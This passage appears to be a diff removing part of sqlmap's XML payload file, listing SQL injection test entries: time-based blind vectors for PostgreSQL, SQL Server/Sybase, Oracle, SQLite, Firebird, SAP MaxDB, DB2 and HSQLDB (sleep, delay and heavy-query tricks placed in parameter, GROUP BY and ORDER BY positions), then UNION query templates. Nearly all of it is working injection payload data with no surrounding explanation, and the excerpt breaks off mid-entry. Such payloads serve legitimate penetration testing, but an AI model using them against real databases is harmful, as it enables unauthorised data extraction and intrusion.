-        <title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
-    <test>
-        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
-        <request>
-            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
-        <request>
-            <payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
-        <request>
-            <payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
-        <request>
-            <payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-    
-    <!-- Untested -->
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- End of time-based blind tests - Parameter replace -->
-
-
-    <!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
-    <test>
-        <title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
-        <request>
-            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>    
-    
-    <test>
-        <title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
-
-
-    <!-- UNION query tests -->
-    <test>
-        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
